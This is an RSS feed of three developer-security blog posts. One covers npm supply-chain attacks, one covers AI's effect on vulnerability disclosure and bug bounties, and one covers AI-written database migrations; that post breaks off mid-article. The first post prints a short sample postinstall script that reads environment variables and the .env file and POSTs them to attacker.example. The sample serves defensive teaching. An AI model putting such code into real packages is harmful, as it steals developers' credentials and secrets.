<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: LayerZero</title>
    <description>The latest articles on DEV Community by LayerZero (@layzerzero105).</description>
    <link>https://dev.to/layzerzero105</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3886969%2F83917794-7873-4114-92dd-33ca3c6996d4.jpeg</url>
      <title>DEV Community: LayerZero</title>
      <link>https://dev.to/layzerzero105</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/layzerzero105"/>
    <language>en</language>
    <item>
      <title>Your next supply-chain attack will come from a package you've never heard of</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Tue, 12 May 2026 05:32:16 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-next-supply-chain-attack-will-come-from-a-package-youve-never-heard-of-4dpl</link>
      <guid>https://dev.to/layzerzero105/your-next-supply-chain-attack-will-come-from-a-package-youve-never-heard-of-4dpl</guid>
      <description>&lt;h2&gt;
  
  
  Most developers think supply-chain attacks happen to other people. Then TanStack happened.
&lt;/h2&gt;

&lt;p&gt;Last week, a popular npm package in the TanStack ecosystem was compromised. Attackers pushed a malicious version that exfiltrated environment variables from any machine that ran &lt;code&gt;npm install&lt;/code&gt; during the window. Thousands of repos pulled it before anyone noticed.&lt;/p&gt;

&lt;p&gt;If you're shipping with AI, you're shipping someone else's code. A lot of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The part nobody wants to admit
&lt;/h2&gt;

&lt;p&gt;When Cursor or Claude Code adds a dependency, you almost never read what it does. You skim the README, glance at the GitHub stars, and run &lt;code&gt;npm install&lt;/code&gt;. That's the workflow. That's also the attack surface.&lt;/p&gt;
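
&lt;p&gt;One cheap habit narrows that surface: before installing, check which lifecycle scripts a package declares. A sketch using npm's registry viewer (&lt;code&gt;left-pad&lt;/code&gt; here is just a placeholder name):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Show the scripts field straight from the registry, before anything runs
npm view left-pad scripts
# No preinstall/install/postinstall in the output? One less way to own you.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;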

&lt;p&gt;Here's the actual chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Your app → 12 direct deps → 400 transitive deps → 4,000 maintainers worldwide
          → any one of them gets phished → your .env is gone
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The TanStack incident wasn't sophisticated. The attacker didn't break crypto. They compromised one maintainer's npm token. That was enough.&lt;/p&gt;
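
&lt;p&gt;If you publish packages yourself, the same door is open on your side. Two npm commands worth running today (assuming you have a publisher account):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Require a second factor for logins AND publishes
npm profile enable-2fa auth-and-writes
# Audit the tokens that could publish as you; revoke the stale ones
npm token list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;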

&lt;h2&gt;
  
  
  What "compromised" actually means for you
&lt;/h2&gt;

&lt;p&gt;Let's be concrete. A malicious postinstall script can do all of this before your terminal prompt comes back:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// postinstall.js — what a real attacker writes&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;execSync&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;child_process&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;https&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;USER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;// grab the entire .env file too&lt;/span&gt;
  &lt;span class="na"&gt;dotenv&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;fs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;utf8&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nx"&gt;https&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://attacker.example/x&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;method&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;POST&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
  &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's about a dozen lines. It runs the moment you install. By the time you see "added 1 package," your OpenAI key, your Stripe secret, and your database URL are already on someone else's server.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three changes that actually move the needle
&lt;/h2&gt;

&lt;p&gt;Most "supply-chain security" advice is theater. Audit logs you'll never read. SBOMs nobody parses. Here's what actually reduces blast radius:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Pin everything. Then verify the lockfile.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm config &lt;span class="nb"&gt;set &lt;/span&gt;save-exact &lt;span class="nb"&gt;true
&lt;/span&gt;npm ci  &lt;span class="c"&gt;# not npm install — ci fails if lockfile drifts&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Exact versions don't prevent the first attack, but they stop the silent auto-upgrade that turns one compromised package into thousands of compromised apps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Disable lifecycle scripts by default.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm config &lt;span class="nb"&gt;set &lt;/span&gt;ignore-scripts &lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This breaks some packages (anything that needs native compilation). That's a feature, not a bug. You'll learn which ones, and you'll vet them once instead of every install.&lt;/p&gt;
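
&lt;p&gt;When a package genuinely needs its build step, re-enable scripts for that one package deliberately, after you've vetted it (&lt;code&gt;better-sqlite3&lt;/code&gt; is just an example of a native-binding dependency):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Run one vetted package's build scripts, on purpose
npm rebuild better-sqlite3 --ignore-scripts=false
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;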

&lt;p&gt;&lt;strong&gt;3. Stop putting production secrets in your dev &lt;code&gt;.env&lt;/code&gt;.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is the one that hurts. Your dev machine shouldn't have access to production Stripe. It shouldn't have the prod database URL. If a postinstall script reads your &lt;code&gt;.env&lt;/code&gt;, the worst it should find is sandbox keys.&lt;/p&gt;
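
&lt;p&gt;What that looks like in practice, sketched (every value here is a placeholder):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# .env — dev machine only: sandbox keys, local database
STRIPE_SECRET_KEY=sk_test_placeholder
DATABASE_URL=postgres://localhost:5432/myapp_dev

# Production values never live in a file on your laptop.
# They live in your host's secret store (Vercel/Fly/AWS env config)
# and are injected at deploy time.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;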

&lt;h2&gt;
  
  
  The uncomfortable truth
&lt;/h2&gt;

&lt;p&gt;You cannot read every dependency. You can't even read 1% of them. The TanStack maintainers couldn't, and they wrote the library.&lt;/p&gt;

&lt;p&gt;The defense isn't more reading. It's smaller blast radius. Pin versions. Kill postinstall. Keep prod secrets out of dev.&lt;/p&gt;

&lt;p&gt;Do those three things this week and the next TanStack-style incident will cost you a &lt;code&gt;git reset&lt;/code&gt;, not a customer notification email.&lt;/p&gt;




&lt;p&gt;If this saved you a 2am Slack message, follow LayerZero. We break down how the internet actually works for developers who ship with AI.&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>AI Is Breaking Two Vulnerability Cultures — And Vibe Coders Are About to Get Caught in the Middle</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Sat, 09 May 2026 00:20:58 +0000</pubDate>
      <link>https://dev.to/layzerzero105/ai-is-breaking-two-vulnerability-cultures-and-vibe-coders-are-about-to-get-caught-in-the-middle-2j1e</link>
      <guid>https://dev.to/layzerzero105/ai-is-breaking-two-vulnerability-cultures-and-vibe-coders-are-about-to-get-caught-in-the-middle-2j1e</guid>
      <description>&lt;p&gt;Two security cultures used to coexist quietly. AI just broke both of them in the same quarter — and if you ship with Claude, Cursor, or Copilot, you are standing exactly where the fallout lands.&lt;/p&gt;

&lt;p&gt;This isn't a researcher's problem. It's a shipping-velocity problem. Yours.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the two cultures actually were
&lt;/h2&gt;

&lt;p&gt;For twenty years the security world ran on two parallel economies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Disclosure culture.&lt;/strong&gt; A researcher finds a bug, tells the vendor, the vendor patches, a CVE goes out, everyone learns. Slow, gentlemanly, reputation-driven. It worked because the supply of researchers was small and the currency was credit, not cash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bounty culture.&lt;/strong&gt; A platform pays researchers per bug. Supply scales with the budget. Bugs are graded. High-severity, high payout.&lt;/p&gt;

&lt;p&gt;Both cultures shared one quiet assumption: &lt;strong&gt;the cost of finding a bug is roughly equal to the value of finding it.&lt;/strong&gt; Researchers spent weeks for credit. Bounty rates matched effort. The economics balanced.&lt;/p&gt;

&lt;p&gt;AI just broke that assumption.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "broken" actually looks like
&lt;/h2&gt;

&lt;p&gt;In the last six months, two things happened that older security folks are still processing:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. AI-assisted vuln research collapsed the cost of finding low-hanging bugs.&lt;/strong&gt; A solo researcher with an LLM-driven fuzzer and an afternoon can now triage a codebase that used to take a team a week. Cost per bug found is cratering. Value per bug found is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. AI-assisted exploit development collapsed the cost of weaponizing them.&lt;/strong&gt; Turning a bug into a working exploit used to require deep platform expertise. The gap between "found" and "weaponized" is now narrowing fast.&lt;/p&gt;

&lt;p&gt;Put those together and you get a culture problem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Disclosure culture&lt;/strong&gt; assumed bugs trickle in. Vendors are buried. The 90-day disclosure window doesn't fit a world where one researcher files 40 bugs in a weekend.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounty culture&lt;/strong&gt; assumed each bug took serious effort, so payouts were premium. Now anyone with $20/month of API credits can mass-submit. Programs are tightening criteria and quietly de-emphasizing volume.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both cultures evolved for a world where vulnerability discovery was an artisanal craft. AI turned it into industrial output.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this lands on vibe coders specifically
&lt;/h2&gt;

&lt;p&gt;Most security writers frame this as a researcher-vendor problem. It isn't. It's a problem for anyone who ships software with dependencies — which means you.&lt;/p&gt;

&lt;p&gt;Three concrete consequences in 2026:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Your dependencies will get bug-bombed faster than maintainers can patch.&lt;/strong&gt; That open-source library with one maintainer who answers issues on weekends is now attractive to AI-augmented researchers, scammers, and worms. CVEs in your tree will spike. Patch latency will spike harder.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. The exploit window after a CVE drops is shrinking from weeks to hours.&lt;/strong&gt; Used to be: CVE published, you had weeks before mass scanning started. Now: CVE published, AI scanners scrape it within hours and start probing every internet-facing service. Your "patch next sprint" timeline is obsolete.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Bug-bounty programs aren't going to save you.&lt;/strong&gt; If your security strategy is "we'll know when researchers tell us," that's a strategy that assumed a researcher economy that's being squeezed from both sides.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to actually do
&lt;/h2&gt;

&lt;p&gt;Three things, in impact-to-effort order.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Patch high-severity on a 7-day clock, not a sprint clock
&lt;/h3&gt;

&lt;p&gt;Set up automated dependency monitoring (Dependabot, Renovate, Snyk — pick one) and hold yourself to &lt;strong&gt;a 7-day patch SLA for anything CVSS 7+&lt;/strong&gt;. Not "we'll get to it." A calendar deadline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/dependabot.yml&lt;/span&gt;
&lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;
&lt;span class="na"&gt;updates&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;package-ecosystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;npm"&lt;/span&gt;
    &lt;span class="na"&gt;directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/"&lt;/span&gt;
    &lt;span class="na"&gt;schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;daily"&lt;/span&gt;
    &lt;span class="na"&gt;open-pull-requests-limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;20&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;security&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;urgent&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If a high-severity dep PR lives more than 7 days, that's a process failure.&lt;/p&gt;
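
&lt;p&gt;You can also make the clock enforce itself: fail CI on known high-severity advisories, so a stale dependency blocks merges instead of waiting politely in a PR. A sketch (pick the line for your ecosystem):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Node: nonzero exit if any high/critical advisory matches your tree
npm audit --audit-level=high
# Python
pip-audit
# Ruby
bundle exec bundle-audit check --update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;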

&lt;h3&gt;
  
  
  2. Lock your supply chain in 30 minutes
&lt;/h3&gt;

&lt;p&gt;You don't need an SBOM platform. You need three things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lockfile committed.&lt;/strong&gt; &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;pnpm-lock.yaml&lt;/code&gt;, &lt;code&gt;poetry.lock&lt;/code&gt; — committed, reviewed in PRs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pinned base images.&lt;/strong&gt; Not &lt;code&gt;node:latest&lt;/code&gt;. Not &lt;code&gt;node:20&lt;/code&gt;. &lt;code&gt;node:20.11.0-alpine3.19@sha256:...&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A way to grep your dependency tree.&lt;/strong&gt; &lt;code&gt;pnpm why &amp;lt;package&amp;gt;&lt;/code&gt; or equivalent. If you can't answer "do I depend on left-pad" in 60 seconds, attackers have the advantage.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Half an hour of work. Moves you from "vulnerable to whatever the world found this morning" to "I have a fighting chance."&lt;/p&gt;
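
&lt;p&gt;The 60-second test, concretely (&lt;code&gt;left-pad&lt;/code&gt; standing in for whatever package is in the news today):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pnpm why left-pad        # who pulls it in, and through which chain
npm ls left-pad --all    # npm equivalent: every path to it in the tree
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;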

&lt;h3&gt;
  
  
  3. Assume your AI assistant will ship you a vulnerable line, and design for it
&lt;/h3&gt;

&lt;p&gt;Your Claude/Cursor/Copilot session is going to introduce a SQL injection, an XSS, or a leaked secret eventually. Not because the AI is bad — because the AI is fast, and faster code shipped without review &lt;em&gt;is&lt;/em&gt; the bug.&lt;/p&gt;

&lt;p&gt;Add a pre-commit linter for the most common AI-introduced mistakes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .pre-commit-config.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;repo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://github.com/zricethezav/gitleaks&lt;/span&gt;
  &lt;span class="na"&gt;rev&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v8.18.0&lt;/span&gt;
  &lt;span class="na"&gt;hooks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gitleaks&lt;/span&gt;    &lt;span class="c1"&gt;# catches accidental secret commits&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;repo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://github.com/PyCQA/bandit&lt;/span&gt;
  &lt;span class="na"&gt;rev&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1.7.5&lt;/span&gt;
  &lt;span class="na"&gt;hooks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bandit&lt;/span&gt;      &lt;span class="c1"&gt;# catches common Python security antipatterns&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Blunt tools. They miss things. They also catch 80% of AI-generated mistakes in two seconds per commit. That's a deal you take.&lt;/p&gt;
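
&lt;p&gt;One gap in that config: bandit only reads Python. If your stack is JS/TS, a semgrep pass covers similar ground; &lt;code&gt;p/javascript&lt;/code&gt; is a public ruleset from the semgrep registry:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# One-off scan with the community JavaScript rules
semgrep scan --config p/javascript
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;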

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The disclosure-versus-bounty debate is a red herring. The real shift is this: &lt;strong&gt;security used to be artisanal on both sides — defense reactive, offense reactive. AI made offense industrial. Defense hasn't caught up.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you wait for the security culture to figure itself out, you are betting that researchers, vendors, and bounty platforms will negotiate a new equilibrium before your stack gets bug-bombed. They will. But the negotiation will take years. Your CVE-to-exploit window is now hours.&lt;/p&gt;

&lt;p&gt;The vibe coders who ship safely in 2026 won't be the ones who memorized OWASP. They'll be the ones who set up automated patch pipelines, locked their supply chain, and added 30 seconds of pre-commit checks — then went back to building.&lt;/p&gt;

&lt;p&gt;The asymmetry is the point. Your attacker is using AI. Your defenses should too.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you sell software in 2026, your security posture is going to come up in deals. It used to be an enterprise-only question ("are you SOC 2 compliant?"). Now SaaS buyers ask because they got burned and they remember.&lt;/p&gt;

&lt;p&gt;When a B2B prospect asks "how do you handle vulnerabilities," the answer "we wait for researchers to tell us" is a deal-killer. "We patch high-severity CVEs in 7 days, lockfiles committed, pre-commit security linting" is a wedge — and it's two days of setup. Cheapest sales differentiator you'll find this quarter.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do today
&lt;/h2&gt;

&lt;p&gt;Run &lt;code&gt;npm audit&lt;/code&gt;, &lt;code&gt;pip-audit&lt;/code&gt;, or &lt;code&gt;bundle audit&lt;/code&gt; on your project right now. Count the high-severity issues. Set a calendar reminder for 7 days from today. Patch them by then. That's the bar — not "review and see what we can do." Patch them.&lt;/p&gt;

&lt;p&gt;Then add Dependabot, then add gitleaks, then go ship.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: the four supply-chain attacks that will hit npm and PyPI in 2026 — and the one-line guard that stops three of them.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>Stop Letting AI Write Your Database Migrations</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Wed, 06 May 2026 18:47:03 +0000</pubDate>
      <link>https://dev.to/layzerzero105/stop-letting-ai-write-your-database-migrations-alh</link>
      <guid>https://dev.to/layzerzero105/stop-letting-ai-write-your-database-migrations-alh</guid>
      <description>&lt;p&gt;A vibe coder I follow lost two days of customer data last weekend.&lt;/p&gt;

&lt;p&gt;Not from a hack. Not from a hardware failure. From a single AI-generated migration that a senior engineer would have caught in 10 seconds.&lt;/p&gt;

&lt;p&gt;If you're shipping with Claude, Cursor, Copilot, or any agent that touches your schema, you need to read this before you run another &lt;code&gt;migrate&lt;/code&gt; command.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually goes wrong
&lt;/h2&gt;

&lt;p&gt;AI is genuinely good at writing application code. It pattern-matches against millions of similar codebases and produces plausible code fast. For most things — components, handlers, glue logic — that's enough. If it's wrong, you re-render. You re-run. You ship a fix.&lt;/p&gt;

&lt;p&gt;Database migrations are different. They have one property the AI quietly ignores: &lt;strong&gt;they execute exactly once, and the wrong sequence is unrecoverable without a backup.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Three failure modes I've now seen in the wild:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Silent column drops.&lt;/strong&gt; The AI "improves" a migration by removing what it thinks is a dead column. The column had three months of customer data. The migration runs in production. The column is gone. You restore from backup and lose everything written since the snapshot.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Type changes that truncate (or refuse to run).&lt;/strong&gt; Convert a &lt;code&gt;TEXT&lt;/code&gt; to &lt;code&gt;VARCHAR(255)&lt;/code&gt;? Sure, the AI will do that. On MySQL without strict mode, the 12 customers whose addresses ran 280 characters silently lose everything past character 255. On Postgres, the same &lt;code&gt;ALTER&lt;/code&gt; aborts with a "value too long" error and stalls your deploy mid-migration. Either way, you find out in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Backwards-incompatible renames mid-deploy.&lt;/strong&gt; The AI renames &lt;code&gt;user_email&lt;/code&gt; to &lt;code&gt;email&lt;/code&gt; because "it's cleaner." The old version of your app, still running on half your boxes during the rolling deploy, throws 500s for 90 seconds. Customers see them.&lt;/p&gt;

&lt;p&gt;None of these are bugs in the AI. The AI did what you asked. The bug is that you're using AI like a junior dev who needs review, except the review never happened.&lt;/p&gt;
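
&lt;p&gt;The boring fix for the rename case is the expand/contract pattern: never rename in a single deploy. Sketched as three deploys (assuming the column from the example lives on a &lt;code&gt;users&lt;/code&gt; table):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Deploy 1 (expand):   ALTER TABLE users ADD COLUMN email TEXT;
#                      app writes to BOTH user_email and email
# Deploy 2 (migrate):  backfill email from user_email; switch reads to email
# Deploy 3 (contract): ALTER TABLE users DROP COLUMN user_email;
# Old and new app versions coexist safely at every step.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;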

&lt;h2&gt;
  
  
  Why migrations are the worst case for AI
&lt;/h2&gt;

&lt;p&gt;Most AI failures are recoverable. You ship a bad component, you redeploy the previous version. You commit a typo, you push a fix. The blast radius is contained to "the next 30 seconds of users."&lt;/p&gt;

&lt;p&gt;Migrations break that pattern in three ways:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;They modify shared, mutable state.&lt;/strong&gt; Code is reproducible from git. Data is not.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;They run irreversibly.&lt;/strong&gt; "Down migrations" exist in theory. In practice, they don't roll back data deletes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;They touch every customer simultaneously.&lt;/strong&gt; A bad migration is not a 5% bug. It's a 100% bug across your entire customer base in one transaction.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination — irreversibility, shared state, fanout — is exactly the property AI shouldn't be trusted with unsupervised. And yet it's the one most vibe coders trust it with the most, because writing migrations is boring and AI is happy to do boring work.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "review" actually means for migrations
&lt;/h2&gt;

&lt;p&gt;When I say "don't let AI run migrations unreviewed," I don't mean "skim the diff before clicking yes."&lt;/p&gt;

&lt;p&gt;I mean this checklist, every time:&lt;br&gt;
&lt;/p&gt;

